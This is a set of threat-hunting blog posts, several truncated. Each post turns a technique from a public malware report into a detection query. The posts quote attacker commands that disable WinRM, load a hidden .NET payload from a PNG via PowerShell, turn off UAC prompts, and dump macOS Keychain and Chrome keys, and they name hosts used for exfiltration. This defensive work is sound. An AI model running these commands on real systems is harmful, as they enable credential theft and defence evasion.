Know Your Adversary

Hello everyone! Today we’ll take a look at the Service Stop technique (T1489) and discuss whether it’s worth hunting for its implementation. This technique is a typical behavioral marker for ransomware and wipers. If you check ATT&CK , you’ll see plenty of examples. Typically, such malware is used at the very end of the cyberattack lifecycle and is hardly a good target for proactive threat hunting. However, there are always exceptions. Let’s take a look at the Prometei botnet. During the malware installation process, it stops the WinRM service and then disables it: sc stop WinRM sc config WinRM start= disabled Why is this done? For example, it makes remote administration more difficult. Could such activity be legitimate? Of course! Therefore, this behavioral marker can be a reasonable target for proactive hunting: event_type: "processcreatewin" AND proc_file_path: "sc.exe" AND cmdline: ("winrm" AND "disabled") See you soon!

Hello everyone! The abuse of legitimate cloud services keeps appearing in public cyber threat research reports, so today we’ll look at a couple of examples related both to malware distribution and data exfiltration. So, the first example we’ll look at is a loader from this report. In this case, the attackers abuse PowerShell to download an image containing malicious code from cloudinary[.]com : hxxps://res[.]cloudinary[.]com/dbjtzqp4q/image/upload/v1767455040/optimized_MSI_lpsd9p.jpg In this case, we can search for suspicious PowerShell interactions with cloudinary[.]com : event_type: "dnsreqwin" AND dns_rname: "cloudinary.com" AND proc_file_path: "powershell.exe" Another example is Muddled Libra . The attackers attempted to use several legitimate services for data exfiltration: upload[.]ee uploadnow[.]io filetransfer[.]io filebin[.]io Suspicious communications with these services can also be searched for: event_type: "dnsreq" AN...

Hello everyone! Today we’ll talk about a supply-chain attack related to Notepad++ and look at whether it was possible to detect the artifacts of compromise associated with it. Let’s take a look at the Kaspersky Lab report dedicated to this attack. The first thing that caught my attention is that, once again, the attackers executed a large number of commands to collect information about the compromised system, for example: cmd /c whoami >> a.txt cmd /c tasklist >> a.txt cmd /c systeminfo >> a.txt cmd /c netstat -ano >> a.txt Yes, hunting for this kind of behavioral markers will generate a lot of “noise,” but if you know your infrastructure well, they can absolutely be worked with: event_type: "processcreatewin" AND proc_p_file_path: "cmd.exe" AND cmdline: (*whoami* OR *tasklist* OR *systeminfo* OR *netstat*) Next, the attackers once again abused cURL, and this time they also used a rather suspicious web service - temp[.]sh : curl.exe -F ...

Hello everyone! Today we’ll look at another interesting example of implementing one of my favorite techniques for proactive hunting - Command and Scripting Interpreter: PowerShell (T1059.001) . This example is related to the distribution of the SHEETCREEP backdoor. The attackers distributed ZIP archives that contained two files: an LNK and a PNG. Opening the LNK file executed the following command: powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType(\"Task10.Program\")::MB())" The command reads bytes from the PNG file, reverses them, and loads them as a .NET assembly. What can we hunt for? For example, reading bytes with PowerShell from suspicious files, in particular PNG files (of course, you can extend this list): event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: (*ReadAllBytes* AND *png*) See yo...

Hello everyone! Today we’re going to look at another interesting example of the Modify Registry (T1112) technique, this time in the context of the Defense Evasion tactic. So, today’s example comes from an activity cluster known as KONNI . The malware used by the attacker modified the following registry parameter: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin This parameter defines how Windows requests confirmation for privilege elevation for administrators. Of course, the attackers change its value to “0”, which allows privilege elevation to occur without any confirmation. Therefore, it may be a good idea to look for suspicious events related to modification of this parameter: event_type: "registryvaluesetwin" AND reg_key_path: "consentpromptbehavioradmin" AND reg_value_data: "0x00000000" By the way, the report we’re discussing is yet another example of how attackers are abusing AI to develop malware and tools! ...

Hello everyone! It’s been a while since we last talked about macOS, so it’s high time to fix that. Today, we’ll look at an example of implementing the technique Credentials from Password Stores: Keychain (T1555.001) . As before, our focus is on real-world threats, and as an example we’ll examine MonetaStealer . This malware actively abuses the built-in macOS security utility, which is designed to work with the macOS security system - primarily the Keychain, certificates, passwords, and access control policies. For example, the stealer abuses this utility to obtain the key used to decrypt passwords saved in Google Chrome: security find-generic-password -w -a "Chrome" The utility is also used to extract data from the Keychain and search for specific keywords: security dump-keychain 2>/dev/null | grep -i {keyword} | head -20 Both examples can be good targets for hunting (or even detection): event_type: "processcreatemac" AND proc_file_path: "security" AND...